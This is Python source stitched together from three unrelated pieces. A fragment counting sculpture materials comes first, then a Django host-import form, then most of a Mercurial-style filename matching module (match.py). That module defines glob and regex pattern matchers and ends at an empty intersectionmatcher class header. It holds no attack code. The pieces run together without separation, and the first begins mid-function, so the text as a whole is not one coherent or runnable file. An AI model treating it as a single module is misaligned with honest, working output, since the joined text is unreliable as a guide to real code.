    uniquematerials = set()
    for item in items:
        print(item)
        # Only sculptures expose material(); duck-type via hasattr.
        if hasattr(item, "material"):
            uniquematerials.add(item.material())
    print("Sculptures use {0} unique materials".format(len(uniquematerials)))


#!/usr/bin/env python
# -*- coding:utf-8 -*-

"""
@author: Will
"""
from django import forms
from app01 import models

class ImportFrom(forms.Form):
    """Host-import form whose host_type choices are refreshed from the DB."""

    # Static fallback choices; replaced from the database in __init__.
    # (Original comment: "replace with a file".)
    HOST_TYPE = ((1, "001"), (2, "002"))

    host_type = forms.IntegerField(
        widget=forms.Select(choices=HOST_TYPE)
    )

    hostname = forms.CharField()

    def __init__(self, *args, **kwargs):
        super(ImportFrom, self).__init__(*args, **kwargs)
        # Re-read choices on every instantiation so rows added after server
        # start still appear in the dropdown.
        # Removed: an unused local HOST_TYPE that shadowed the class attribute,
        # and bare `objects.get()` / `objects.filter()` calls whose results
        # were discarded (`get()` with no arguments raises unless the table
        # holds exactly one row).
        self.fields['host_type'].widget.choices = models.userInfo.objects.all().values_list("id", "name")














# Portions Copyright (c) Facebook, Inc. and its affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.

# match.py - filename matching
#
#  Copyright 2008, 2009 Matt Mackall <mpm@selenic.com> and others
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.

from __future__ import absolute_import, print_function

import copy
import os
import re

from bindings import pathmatcher

from . import error, pathutil, pycompat, util
from .i18n import _
from .pycompat import decodeutf8


# Every pattern-kind prefix understood by this module; see the match()
# docstring for what each prefix means.
allpatternkinds = (
    "re",
    "glob",
    "path",
    "relglob",
    "relpath",
    "relre",
    "listfile",
    "listfile0",
    "set",
    "include",
    "subinclude",
    "rootfilesin",
)
# Kinds whose patterns are interpreted relative to cwd rather than the
# repository root.
cwdrelativepatternkinds = ("relpath", "glob")

# Local alias for util's caching property decorator.
propertycache = util.propertycache


def _rematcher(regex):
    """compile the regexp with the best available regexp engine and return a
    matcher function"""
    compiled = util.re.compile(regex)
    # Facebook's re2 bindings expose a slightly faster test_match; fall back
    # to the standard match method when it is absent.
    try:
        return compiled.test_match
    except AttributeError:
        return compiled.match


def _expandsets(kindpats, ctx):
    """Returns the kindpats list with the 'set' patterns expanded.

    'set' entries are evaluated through *ctx* and collected into a file set;
    everything else is passed through unchanged.
    """
    fset = set()
    rest = []

    for kind, pat, source in kindpats:
        if kind != "set":
            rest.append((kind, pat, source))
            continue
        if not ctx:
            raise error.ProgrammingError("fileset expression with no context")
        fset.update(ctx.getfileset(pat))
    return fset, rest


def _expandsubinclude(kindpats, root):
    """Returns the list of subinclude matcher args and the kindpats without the
    subincludes in it."""
    relmatchers = []
    remaining = []

    for kind, pat, source in kindpats:
        if kind != "subinclude":
            remaining.append((kind, pat, source))
            continue
        # Resolve the subinclude file relative to the file that named it.
        sourceroot = pathutil.dirname(util.normpath(source))
        path = pathutil.join(sourceroot, util.pconvert(pat))
        newroot = pathutil.dirname(path)
        matcherargs = (newroot, "", [], ["include:%s" % path])

        # Prefix of repo paths the submatcher applies to ('' means the root).
        prefix = pathutil.canonpath(root, root, newroot)
        if prefix:
            prefix += "/"
        relmatchers.append((prefix, matcherargs))

    return relmatchers, remaining


def _kindpatsalwaysmatch(kindpats):
    """Checks whether the kindpats match everything, as e.g. 'relpath:.' does.

    De Morgan of the original loop: every entry must be an empty pattern of a
    cwd-relative kind.
    """
    # TODO: update me?
    return all(
        pat == "" and kind in ("relpath", "glob")
        for kind, pat, source in kindpats
    )


def match(
    root,
    cwd,
    patterns=None,
    include=None,
    exclude=None,
    default="glob",
    exact=False,
    auditor=None,
    ctx=None,
    warn=None,
    badfn=None,
    icasefs=False,
):
    """build an object to match a set of file patterns

    arguments:
    root - the canonical root of the tree you're matching against
    cwd - the current working directory, if relevant
    patterns - patterns to find
    include - patterns to include (unless they are excluded)
    exclude - patterns to exclude (even if they are included)
    default - if a pattern in patterns has no explicit type, assume this one
    exact - patterns are actually filenames (include/exclude still apply)
    warn - optional function used for printing warnings
    badfn - optional bad() callback for this matcher instead of the default
    icasefs - make a matcher for wdir on case insensitive filesystems, which
        normalizes the given patterns to the case in the filesystem

    a pattern is one of:
    'glob:<glob>' - a glob relative to cwd
    're:<regexp>' - a regular expression
    'path:<path>' - a path relative to repository root, which is matched
                    recursively
    'rootfilesin:<path>' - a path relative to repository root, which is
                    matched non-recursively (will not match subdirectories)
    'relglob:<glob>' - an unrooted glob (*.c matches C files in all dirs)
    'relpath:<path>' - a path relative to cwd
    'relre:<regexp>' - a regexp that needn't match the start of a name
    'set:<fileset>' - a fileset expression
    'include:<path>' - a file of patterns to read and include
    'subinclude:<path>' - a file of patterns to match against files under
                          the same directory
    '<something>' - a pattern of the specified default type
    """
    if auditor is None:
        auditor = pathutil.pathauditor(root)
    # Default normalization; may be replaced below for case-insensitive FSes.
    normalize = _donormalize
    if icasefs:
        if exact:
            raise error.ProgrammingError(
                "a case-insensitive exact matcher " "doesn't make sense"
            )
        # Fold each non-regex pattern to the case recorded in the dirstate.
        dirstate = ctx.repo().dirstate
        dsnormalize = dirstate.normalize

        def normalize(patterns, default, root, cwd, auditor, warn):
            # Same contract as _donormalize, plus dirstate case folding.
            kp = _donormalize(patterns, default, root, cwd, auditor, warn)
            kindpats = []
            for kind, pats, source in kp:
                if kind not in ("re", "relre"):  # regex can't be normalized
                    p = pats
                    pats = dsnormalize(pats)

                    # Preserve the original to handle a case only rename.
                    if p != pats and p in dirstate:
                        kindpats.append((kind, p, source))

                kindpats.append((kind, pats, source))
            return kindpats

    if exact:
        m = exactmatcher(root, cwd, patterns, badfn)
    elif patterns:
        kindpats = normalize(patterns, default, root, cwd, auditor, warn)
        if _kindpatsalwaysmatch(kindpats):
            m = alwaysmatcher(root, cwd, badfn, relativeuipath=True)
        else:
            m = patternmatcher(root, cwd, kindpats, ctx=ctx, badfn=badfn)
    else:
        # It's a little strange that no patterns means to match everything.
        # Consider changing this to match nothing (probably using nevermatcher).
        m = alwaysmatcher(root, cwd, badfn)

    if include:
        # Intersect with the include patterns (a file must match both).
        kindpats = normalize(include, "glob", root, cwd, auditor, warn)
        im = includematcher(root, cwd, kindpats, ctx=ctx, badfn=None)
        m = intersectmatchers(m, im)
    if exclude:
        # Subtract the exclude patterns (excludes win over includes).
        kindpats = normalize(exclude, "glob", root, cwd, auditor, warn)
        em = includematcher(root, cwd, kindpats, ctx=ctx, badfn=None)
        m = differencematcher(m, em)
    return m


def exact(root, cwd, files, badfn=None):
    """Convenience wrapper: build an exactmatcher over *files*."""
    matcher = exactmatcher(root, cwd, files, badfn=badfn)
    return matcher


def always(root, cwd):
    """Convenience wrapper: a matcher that matches every file."""
    matcher = alwaysmatcher(root, cwd)
    return matcher


def never(root, cwd):
    """Convenience wrapper: a matcher that matches no file."""
    matcher = nevermatcher(root, cwd)
    return matcher


def union(matches, root, cwd):
    """Union a list of matchers.

    If the list is empty, return nevermatcher.
    If the list only contains one non-None value, return that matcher.
    Otherwise return a union matcher.
    """
    present = [m for m in matches if m]
    if not present:
        return nevermatcher(root, cwd)
    if len(present) == 1:
        return present[0]
    return unionmatcher(present)


def badmatch(match, badfn):
    """Make a copy of the given matcher, replacing its bad method with the given
    one.
    """
    clone = copy.copy(match)
    clone.bad = badfn
    return clone


def _donormalize(patterns, default, root, cwd, auditor, warn):
    """Convert 'kind:pat' from the patterns list to tuples with kind and
    normalized and rooted patterns and with listfiles expanded."""
    kindpats = []
    for kind, pat in [_patsplit(p, default) for p in patterns]:
        if kind in cwdrelativepatternkinds:
            # cwd-relative kinds: root the pattern at the repo root,
            # validating it with the auditor.
            pat = pathutil.canonpath(root, cwd, pat, auditor)
        elif kind in ("relglob", "path", "rootfilesin"):
            pat = util.normpath(pat)
        elif kind in ("listfile", "listfile0"):
            # A file containing one pattern per line (or NUL-separated for
            # listfile0); each entry is recursively normalized, with the
            # listfile's path recorded as the entry's source.
            try:
                files = decodeutf8(util.readfile(pat))
                if kind == "listfile0":
                    files = files.split("\0")
                else:
                    files = files.splitlines()
                files = [f for f in files if f]
            except EnvironmentError:
                raise error.Abort(_("unable to read file list (%s)") % pat)
            for k, p, source in _donormalize(files, default, root, cwd, auditor, warn):
                kindpats.append((k, p, pat))
            continue
        elif kind == "include":
            # A pattern file; unreadable files are skipped with a warning
            # rather than aborting the whole normalization.
            try:
                fullpath = os.path.join(root, util.localpath(pat))
                includepats = readpatternfile(fullpath, warn)
                for k, p, source in _donormalize(
                    includepats, default, root, cwd, auditor, warn
                ):
                    kindpats.append((k, p, source or pat))
            except error.Abort as inst:
                raise error.Abort("%s: %s" % (pat, inst[0]))
            except IOError as inst:
                if warn:
                    warn(
                        _("skipping unreadable pattern file '%s': %s\n")
                        % (pat, inst.strerror)
                    )
            continue
        # else: re or relre - which cannot be normalized
        kindpats.append((kind, pat, ""))
    return kindpats


def _testrefastpath(repat):
    """Test if a re pattern can use fast path.

    That is, for every "$A/$B" path the pattern matches, "$A" must also be
    matched,

    Return True if we're sure it is. Return False otherwise.
    """
    # XXX: It's very hard to implement this in general, so this is a hacky
    # allowlist of the shapes used in production and tests; re matchers are
    # planned to go away eventually.

    # Rules like "(?!experimental/)"
    negative_lookahead = (
        repat.startswith("(?!") and repat.endswith(")") and repat.count(")") == 1
    )
    if negative_lookahead:
        return True

    # Rule used in doctest
    return repat == "(i|j)$"


def _globpatsplit(pat):
    """Split a glob pattern. Return a list.

    A naive version is "path.split("/")". This function also respects curly
    brace groups, like "{*,{a,b}*/*}".

    >>> _globpatsplit("*/**/x/{a,b/c}")
    ['*', '**', 'x', '{a,b/c}']
    """
    parts = []
    current = ""
    depth = 0
    for ch in pat:
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
        # Only split on "/" outside of any brace group.
        if ch == "/" and depth == 0:
            if current:
                parts.append(current)
                current = ""
        else:
            current += ch
    if current:
        parts.append(current)
    return parts


class _tree(dict):
    """A tree intended to answer "visitdir" questions with more efficient
    answers (ex. return "all" or False if possible).

    Maps subdirectory name -> child _tree node.
    """

    def __init__(self, *args, **kwargs):
        # If True, avoid entering subdirectories, and match everything recursively,
        # unconditionally.
        self.matchrecursive = False
        # If True, avoid entering subdirectories, and return "unsure" for
        # everything. This is set to True when complex re patterns (potentially
        # including "/") are used.
        self.unsurerecursive = False
        # Patterns for matching paths in this directory.
        self._kindpats = []
        # Glob patterns used to match parent directories of another glob
        # pattern.
        self._globdirpats = []
        super(_tree, self).__init__(*args, **kwargs)

    def insert(self, path, matchrecursive=True, globpats=None, repats=None):
        """Insert a directory path to this tree.

        If matchrecursive is True, mark the directory as unconditionally
        include files and subdirs recursively.

        If globpats or repats are specified, append them to the patterns being
        applied at this directory. The tricky part is those patterns can match
        "x/y/z" and visit("x"), visit("x/y") need to return True, while we
        still want visit("x/a") to return False.
        """
        if path == "":
            # Reached the target node: record the patterns here.
            self.matchrecursive |= matchrecursive
            if globpats:
                # Need to match parent directories too.
                for pat in globpats:
                    components = _globpatsplit(pat)
                    parentpat = ""
                    for comp in components:
                        if parentpat:
                            parentpat += "/"
                        parentpat += comp
                        if "/" in comp:
                            # Giving up - fallback to slow paths.
                            self.unsurerecursive = True
                        self._globdirpats.append(parentpat)
                if any("**" in p for p in globpats):
                    # Giving up - "**" matches paths including "/"
                    self.unsurerecursive = True
                self._kindpats += [("glob", pat, "") for pat in globpats]
            if repats:
                if not all(map(_testrefastpath, repats)):
                    # Giving up - fallback to slow paths.
                    self.unsurerecursive = True
                self._kindpats += [("re", pat, "") for pat in repats]
            return

        # Recurse into (creating if needed) the child for the first component.
        subdir, rest = self._split(path)
        self.setdefault(subdir, _tree()).insert(rest, matchrecursive, globpats, repats)

    def visitdir(self, path):
        """Similar to matcher.visitdir"""
        path = normalizerootdir(path, "visitdir")
        if self.matchrecursive:
            return "all"
        elif self.unsurerecursive:
            return True
        elif path == "":
            return True

        if self._kindpats and self._compiledpats(path):
            # XXX: This is incorrect. But re patterns are already used in
            # production. We should kill them!
            # Need to test "if every string starting with 'path' matches".
            # Obviously it's impossible to test *every* string with the
            # standard regex API, therefore pick a random strange path to test
            # it approximately.
            if self._compiledpats("%s/*/_/-/0/*" % path):
                return "all"
            else:
                return True

        if self._globdirpats and self._compileddirpats(path):
            return True

        subdir, rest = self._split(path)
        subtree = self.get(subdir)
        if subtree is None:
            return False
        else:
            return subtree.visitdir(rest)

    @util.propertycache
    def _compiledpats(self):
        # Cached (per-node) match function over this node's own patterns;
        # note the property's value is a callable.
        pat, matchfunc = _buildregexmatch(self._kindpats, "")
        return matchfunc

    @util.propertycache
    def _compileddirpats(self):
        # Cached match function over the parent-directory glob patterns,
        # anchored with "$" so only whole directory names match.
        pat, matchfunc = _buildregexmatch(
            [("glob", p, "") for p in self._globdirpats], "$"
        )
        return matchfunc

    def _split(self, path):
        # Split "a/b/c" into ("a", "b/c"); a leading "/" is rejected.
        if "/" in path:
            subdir, rest = path.split("/", 1)
        else:
            subdir, rest = path, ""
        if not subdir:
            raise error.ProgrammingError("path cannot be absolute")
        return subdir, rest


def _remainingpats(pat, prefix):
    """list of patterns with prefix stripped

    >>> _remainingpats("a/b/c", "")
    ['a/b/c']
    >>> _remainingpats("a/b/c", "a")
    ['b/c']
    >>> _remainingpats("a/b/c", "a/b")
    ['c']
    >>> _remainingpats("a/b/c", "a/b/c")
    []
    >>> _remainingpats("", "")
    []
    """
    if not prefix:
        return [pat] if pat else []
    if prefix == pat:
        return []
    # prefix must be a proper path-prefix of pat.
    assert pat[len(prefix)] == "/"
    return [pat[len(prefix) + 1 :]]


def _buildvisitdir(kindpats):
    """Try to build an efficient visitdir function

    Return a visitdir function if it's built. Otherwise return None
    if there are unsupported patterns.

    >>> _buildvisitdir([('include', 'foo', '')])
    >>> _buildvisitdir([('relglob', 'foo', '')])
    >>> t = _buildvisitdir([
    ...     ('glob', 'a/b', ''),
    ...     ('glob', 'c/*.d', ''),
    ...     ('glob', 'e/**/*.c', ''),
    ...     ('re', '^f/(?!g)', ''), # no "$", only match prefix
    ...     ('re', '^h/(i|j)$', ''),
    ...     ('glob', 'i/a*/b*/c*', ''),
    ...     ('glob', 'i/a5/b7/d', ''),
    ...     ('glob', 'j/**.c', ''),
    ... ])
    >>> t('a')
    True
    >>> t('a/b')
    'all'
    >>> t('a/b/c')
    'all'
    >>> t('c')
    True
    >>> t('c/d')
    False
    >>> t('c/rc.d')
    'all'
    >>> t('c/rc.d/foo')
    'all'
    >>> t('e')
    True
    >>> t('e/a')
    True
    >>> t('e/a/b.c')
    True
    >>> t('e/a/b.d')
    True
    >>> t('f')
    True
    >>> t('f/g')
    False
    >>> t('f/g2')
    False
    >>> t('f/g/a')
    False
    >>> t('f/h')
    'all'
    >>> t('f/h/i')
    'all'
    >>> t('h/i')
    True
    >>> t('h/i/k')
    False
    >>> t('h/k')
    False
    >>> t('i')
    True
    >>> t('i/a1')
    True
    >>> t('i/b2')
    False
    >>> t('i/a/b2/c3')
    'all'
    >>> t('i/a/b2/d4')
    False
    >>> t('i/a5/b7/d')
    'all'
    >>> t('j/x/y')
    True
    >>> t('z')
    False
    """
    tree = _tree()
    for kind, pat, _source in kindpats:
        if kind == "glob":
            # Use the longest wildcard-free leading components as the tree
            # path; whatever remains stays a glob applied at that node.
            components = []
            for p in pat.split("/"):
                if "[" in p or "{" in p or "*" in p or "?" in p:
                    break
                components.append(p)
            prefix = "/".join(components)
            matchrecursive = prefix == pat
            tree.insert(
                prefix,
                matchrecursive=matchrecursive,
                globpats=_remainingpats(pat, prefix),
            )
        elif kind == "re":
            # Still try to get a plain prefix from the regular expression so we
            # can still have fast paths.
            if pat.startswith("^"):
                # "re" already matches from the beginning, unlike "relre"
                pat = pat[1:]
            components = []
            for p in pat.split("/"):
                if re.escape(p) != p:
                    # contains special characters
                    break
                components.append(p)
            prefix = "/".join(components)
            tree.insert(
                prefix, matchrecursive=False, repats=_remainingpats(pat, prefix)
            )
        else:
            # Unsupported kind
            return None
    return tree.visitdir


class basematcher(object):
    """Base class for matchers; by default matches nothing."""

    def __init__(self, root, cwd, badfn=None, relativeuipath=True):
        # root: canonical root of the tree being matched; cwd: current
        # working directory (used for display paths).
        self._root = root
        self._cwd = cwd
        if badfn is not None:
            self.bad = badfn
        self._relativeuipath = relativeuipath

    def __repr__(self):
        return "<%s>" % self.__class__.__name__

    def __call__(self, fn):
        # Calling the matcher is shorthand for matchfn().
        return self.matchfn(fn)

    def __iter__(self):
        # Iterate the explicitly listed files (see files()).
        for f in self._files:
            yield f

    # Callbacks related to how the matcher is used by dirstate.walk.
    # Subscribers to these events must monkeypatch the matcher object.
    def bad(self, f, msg):
        """Callback from dirstate.walk for each explicit file that can't be
        found/accessed, with an error message."""

    # If an traversedir is set, it will be called when a directory discovered
    # by recursive traversal is visited.
    traversedir = None

    def abs(self, f):
        """Convert a repo path back to path that is relative to the root of the
        matcher."""
        return f

    def rel(self, f):
        """Convert repo path back to path that is relative to cwd of matcher."""
        return util.pathto(self._root, self._cwd, f)

    def uipath(self, f):
        """Convert repo path to a display path.  If patterns or -I/-X were used
        to create this matcher, the display path will be relative to cwd.
        Otherwise it is relative to the root of the repo."""
        return (self._relativeuipath and self.rel(f)) or self.abs(f)

    @propertycache
    def _files(self):
        # Cached list of explicit files; subclasses override.
        return []

    def files(self):
        """Explicitly listed files or patterns or roots:
        if no patterns or .always(): empty list,
        if exact: list exact files,
        if not .anypats(): list all files and dirs,
        else: optimal roots"""
        return self._files

    @propertycache
    def _fileset(self):
        # Set form of _files for O(1) membership tests in exact().
        return set(self._files)

    def exact(self, f):
        """Returns True if f is in .files()."""
        return f in self._fileset

    def matchfn(self, f):
        # Whether file f matches; subclasses override (default: no match).
        return False

    def visitdir(self, dir):
        """Decides whether a directory should be visited based on whether it
        has potential matches in it or one of its subdirectories. This is
        based on the match's primary, included, and excluded patterns.

        Returns the string 'all' if the given directory and all subdirectories
        should be visited. Otherwise returns True or False indicating whether
        the given directory should be visited.
        """
        return True

    def always(self):
        """Matcher will match everything and .files() will be empty --
        optimization might be possible."""
        return False

    def isexact(self):
        """Matcher will match exactly the list of files in .files() --
        optimization might be possible."""
        return False

    def prefix(self):
        """Matcher will match the paths in .files() recursively --
        optimization might be possible."""
        return False

    def anypats(self):
        """None of .always(), .isexact(), and .prefix() is true --
        optimizations will be difficult."""
        return not self.always() and not self.isexact() and not self.prefix()


class alwaysmatcher(basematcher):
    """Matches everything."""

    def __init__(self, root, cwd, badfn=None, relativeuipath=False):
        super(alwaysmatcher, self).__init__(
            root, cwd, badfn, relativeuipath=relativeuipath
        )

    def visitdir(self, dir):
        # Every directory and everything below it matches.
        return "all"

    def matchfn(self, f):
        # Every file matches.
        return True

    def always(self):
        return True

    def __repr__(self):
        return "<alwaysmatcher>"


class nevermatcher(basematcher):
    """Matches nothing."""

    def __init__(self, root, cwd, badfn=None):
        super(nevermatcher, self).__init__(root, cwd, badfn)

    def visitdir(self, dir):
        # No directory can contain a match.
        return False

    # It's a little weird to say that the nevermatcher is an exact matcher
    # or a prefix matcher, but it seems to make sense to let callers take
    # fast paths based on either. There will be no exact matches, nor any
    # prefixes (files() returns []), so fast paths iterating over them should
    # be efficient (and correct).
    def isexact(self):
        return True

    def prefix(self):
        return True

    def __repr__(self):
        return "<nevermatcher>"


class gitignorematcher(basematcher):
    """Match files specified by ".gitignore"s"""

    def __init__(self, root, cwd, badfn=None, gitignorepaths=None):
        super(gitignorematcher, self).__init__(root, cwd, badfn)
        self._matcher = pathmatcher.gitignorematcher(root, gitignorepaths or [])

    def matchfn(self, f):
        # XXX: is_dir is passed as True for performance; it should reflect
        # whether "f" really is a directory.
        return self._matcher.match_relative(f, True)

    def explain(self, f):
        return self._matcher.explain(f, True)

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        if self._matcher.match_relative(dir, True):
            # Everything in the directory is selected (ignored)
            return "all"
        # Not sure
        return True

    def __repr__(self):
        return "<gitignorematcher>"


class treematcher(basematcher):
    """Match glob patterns with negative pattern support.
    Have a smarter 'visitdir' implementation.
    """

    def __init__(self, root, cwd, badfn=None, rules=None):
        # FIX: `rules=None` replaces the mutable default `rules=[]`. Behavior
        # is unchanged (the list was always copied before use) but the
        # shared-mutable-default pitfall is removed.
        super(treematcher, self).__init__(root, cwd, badfn)
        rules = list(rules) if rules is not None else []
        self._matcher = pathmatcher.treematcher(rules)
        self._rules = rules

    def matchfn(self, f):
        return self._matcher.matches(f)

    def visitdir(self, dir):
        # Map the native matcher's tri-state (None/True/False) onto the
        # visitdir protocol (unsure / everything matches / nothing matches).
        matched = self._matcher.match_recursive(dir)
        if matched is None:
            return True
        elif matched is True:
            return "all"
        else:
            assert matched is False
            return False

    def __repr__(self):
        return "<treematcher rules=%r>" % self._rules


def normalizerootdir(dir, funcname):
    """Map the legacy '.' root-directory spelling to '' (with a deprecation
    warning); any other value is returned unchanged."""
    if dir != ".":
        return dir
    util.nouideprecwarn(
        "match.%s() no longer accepts '.', use '' instead." % funcname, "20190805"
    )
    return ""


def _kindpatstoglobs(kindpats, recursive=False):
    """Attempt to convert 'kindpats' to glob patterns that can be used in a
    treematcher.

    kindpats should be already normalized to be relative to repo root.

    If recursive is True, `glob:a*` will match both `a1/b` and `a1`, otherwise
    `glob:a*` will only match `a1` but not `a1/b`.

    Return None if there are unsupported patterns (ex. regular expressions).
    """
    if not _usetreematcher:
        return None
    globs = []
    for kindpat in kindpats:
        kind, pat = kindpat[0:2]
        if kind == "re":
            # Only a few regex shapes are convertible to globs.
            converted = _convertretoglobs(pat)
            if converted is None:
                return None
            globs.extend(converted)
        elif kind == "glob":
            # The treematcher (man gitignore) does not support csh-style
            # brackets (ex. "{a,b,c}"). Expand the brackets to patterns.
            for subpat in pathmatcher.expandcurlybrackets(pat):
                normalized = pathmatcher.normalizeglob(subpat)
                if recursive:
                    normalized = _makeglobrecursive(normalized)
                globs.append(normalized)
        elif kind == "path":
            if pat == ".":
                # Special case. Comes from `util.normpath`.
                pat = ""
            else:
                pat = pathmatcher.plaintoglob(pat)
            globs.append(_makeglobrecursive(pat))
        else:
            return None
    return globs


def _makeglobrecursive(pat):
    """Make a glob pattern recursive by appending "/**" to it"""
    if pat.endswith("/") or not pat:
        return pat + "**"
    else:
        return pat + "/**"


# Recognizes "re:x/(?!y/)" — meaning: include x, but not x/y.
# Group 1 is the included prefix, group 2 the excluded subdirectory.
_repat1 = re.compile(r"^\^?([\w._/]+)/\(\?\!([\w._/]+)/?\)$")

# Recognizes "re:x/(?:.*/)?y" — equivalent to "glob:x/**/y".
# Group 1 is the leading path, group 2 the basename to match at any depth.
_repat2 = re.compile(r"^\^?([\w._/]+)/\(\?:\.\*/\)\?([\w._]+)(?:\(\?\:\/\|\$\))?$")


def _convertretoglobs(repat):
    """Translate a regular expression into equivalent glob patterns.

    A single regex may map to several globs.  Returns ``None`` when the
    regex does not have one of the supported shapes.

    >>> _convertretoglobs("abc*") is None
    True
    >>> _convertretoglobs("xx/yy/(?!zz/kk)")
    ['xx/yy/**', '!xx/yy/zz/kk/**']
    >>> _convertretoglobs("x/y/(?:.*/)?BUCK")
    ['x/y/**/BUCK']
    """
    matched = _repat1.match(repat)
    if matched is not None:
        prefix, excluded = matched.groups()
        return ["%s/**" % prefix, "!%s/%s/**" % (prefix, excluded)]
    matched = _repat2.match(repat)
    if matched is not None:
        prefix, name = matched.groups()
        return ["%s/**/%s" % (prefix, name)]
    return None


class patternmatcher(basematcher):
    """Matcher built from a list of (kind, pat, source) patterns.

    When every pattern can be translated to a glob, the instance rewrites
    itself into a (faster) treematcher; otherwise it falls back to a
    compiled-regex matcher.
    """

    def __init__(self, root, cwd, kindpats, ctx=None, badfn=None):
        super(patternmatcher, self).__init__(root, cwd, badfn)
        # kindpats are already normalized to be relative to repo-root.
        # Can we use tree matcher?
        rules = _kindpatstoglobs(kindpats, recursive=False)
        fallback = True
        if rules is not None:
            try:
                matcher = treematcher(root, cwd, badfn=badfn, rules=rules)
                # Replace self to 'matcher': adopt its state and type
                # wholesale so this object *becomes* the treematcher.
                self.__dict__ = matcher.__dict__
                self.__class__ = matcher.__class__
                fallback = False
            except ValueError:
                # for example, Regex("Compiled regex exceeds size limit of 10485760 bytes.")
                pass
        if fallback:
            self._prefix = _prefix(kindpats)
            self._pats, self.matchfn = _buildmatch(ctx, kindpats, "$", root)

        self._files = _explicitfiles(kindpats)

    @propertycache
    def _dirs(self):
        # All ancestor directories of the explicit files, computed lazily.
        return set(util.dirs(self._fileset))

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        if self._prefix and dir in self._fileset:
            return "all"
        if not self._prefix:
            # Non-prefix patterns may match anywhere below any directory,
            # so every directory has to be visited.
            return True
        return (
            dir in self._fileset
            or dir in self._dirs
            or any(parentdir in self._fileset for parentdir in util.finddirs(dir))
        )

    def prefix(self):
        return self._prefix

    def __repr__(self):
        return "<patternmatcher patterns=%r>" % self._pats


class includematcher(basematcher):
    """Matcher for include (-I/-X style) patterns.

    Like patternmatcher, but globs are applied recursively and visitdir()
    is tuned for include semantics.  When every pattern translates to a
    glob, the instance rewrites itself into a treematcher.
    """

    def __init__(self, root, cwd, kindpats, ctx=None, badfn=None):
        super(includematcher, self).__init__(root, cwd, badfn)

        # Can we use tree matcher?
        rules = _kindpatstoglobs(kindpats, recursive=True)
        fallback = True
        if rules is not None:
            try:
                matcher = treematcher(root, cwd, badfn=badfn, rules=rules)
                # Replace self to 'matcher': adopt its state and type
                # wholesale so this object *becomes* the treematcher.
                self.__dict__ = matcher.__dict__
                self.__class__ = matcher.__class__
                fallback = False
            except ValueError:
                # for example, Regex("Compiled regex exceeds size limit of 10485760 bytes.")
                pass
        if fallback:
            self._pats, self.matchfn = _buildmatch(ctx, kindpats, "(?:/|$)", root)
            # prefix is True if all patterns are recursive, so certain fast paths
            # can be enabled. Unfortunately, it's too easy to break it (ex. by
            # using "glob:*.c", "re:...", etc).
            self._prefix = _prefix(kindpats)
            roots, dirs = _rootsanddirs(kindpats)
            # roots are directories which are recursively included.
            # If self._prefix is True, then _roots can have a fast path for
            # visitdir to return "all", marking things included unconditionally.
            # If self._prefix is False, then that optimization is unsound because
            # "roots" might contain entries that is not recursive (ex. roots will
            # include "foo/bar" for pattern "glob:foo/bar/*.c").
            self._roots = set(roots)
            # dirs are directories which are non-recursively included.
            # That is, files under that directory are included. But not
            # subdirectories.
            self._dirs = set(dirs)
            # Try to use a more efficient visitdir implementation; the
            # instance attribute shadows the method defined below.
            visitdir = _buildvisitdir(kindpats)
            if visitdir:
                self.visitdir = visitdir

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        if self._prefix and dir in self._roots:
            return "all"
        return (
            dir in self._roots
            or dir in self._dirs
            or any(parentdir in self._roots for parentdir in util.finddirs(dir))
        )

    def __repr__(self):
        return "<includematcher includes=%r>" % self._pats


class exactmatcher(basematcher):
    """Match exactly the given files.

    Inputs are treated as plain paths, never as patterns, so no
    kind-prefixes apply.
    """

    def __init__(self, root, cwd, files, badfn=None):
        super(exactmatcher, self).__init__(root, cwd, badfn)
        # Keep list arguments as-is; copy any other iterable into a list.
        self._files = files if isinstance(files, list) else list(files)

    matchfn = basematcher.exact

    @propertycache
    def _dirs(self):
        # Every ancestor directory of a listed file.
        return set(util.dirs(self._fileset))

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        return dir in self._dirs

    def isexact(self):
        return True

    def __repr__(self):
        return "<exactmatcher files=%r>" % self._files


class differencematcher(basematcher):
    """Match what ``m1`` matches, minus what ``m2`` matches.

    Well, almost: exact matches win even when ``m2`` also matches them.
    A user pattern like "-X foo foo" therefore still matches "foo",
    because exact matches are treated specially.  Since this matcher
    implements excludes, it preserves that special case.

    ``m2``'s non-matching attributes (root, cwd, bad, traversedir) are
    ignored.

    TODO: to keep the exact-match behavior described above, consider
    instead modeling the case as something like
    union(exact(foo), difference(pattern(foo), include(foo))).
    """

    def __init__(self, m1, m2):
        super(differencematcher, self).__init__(m1._root, m1._cwd)
        self._m1 = m1
        self._m2 = m2
        self.bad = m1.bad
        self.traversedir = m1.traversedir

    def matchfn(self, f):
        if not self._m1(f):
            return False
        return not self._m2(f) or self._m1.exact(f)

    @propertycache
    def _files(self):
        if self.isexact():
            return [f for f in self._m1.files() if self(f)]
        # With a non-exact m1 we cannot compute the file set, because
        # m1.files() entries are not necessarily files. For example, if
        # m1 is "path:dir" and m2 is "rootfileins:.", "dir" must stay in
        # the set even though m2 matches it, since "dir" may not be a file.
        return self._m1.files()

    def visitdir(self, dir):
        dir = normalizerootdir(dir, "visitdir")
        visit2 = self._m2.visitdir(dir)
        if not visit2:
            return self._m1.visitdir(dir)
        if visit2 == "all":
            # There's a bug here: If m1 matches file 'dir/file' and m2 excludes
            # 'dir' (recursively), we should still visit 'dir' due to the
            # exception we have for exact matches.
            return False
        return bool(self._m1.visitdir(dir))

    def isexact(self):
        return self._m1.isexact()

    def __repr__(self):
        return "<differencematcher m1=%r, m2=%r>" % (self._m1, self._m2)


def intersectmatchers(m1, m2):
    """Compose two matchers into one matching only what both match.

    The second matcher's non-matching attributes (root, cwd, bad,
    traversedir) are ignored.  A ``None`` operand acts as identity.
    """
    if m1 is None:
        return m2
    if m2 is None:
        return m1
    if m1.always():
        m = copy.copy(m2)
        # TODO: encapsulate these attributes in one object so there is a
        # single thing to copy from m1.
        m.bad = m1.bad
        m.traversedir = m1.traversedir
        m.abs = m1.abs
        m.rel = m1.rel
        m._relativeuipath |= m1._relativeuipath
        return m
    if m2.always():
        m = copy.copy(m1)
        m._relativeuipath |= m2._relativeuipath
        return m
    return intersectionmatcher(m1, m2)


class intersectionmatcher(basematcher):
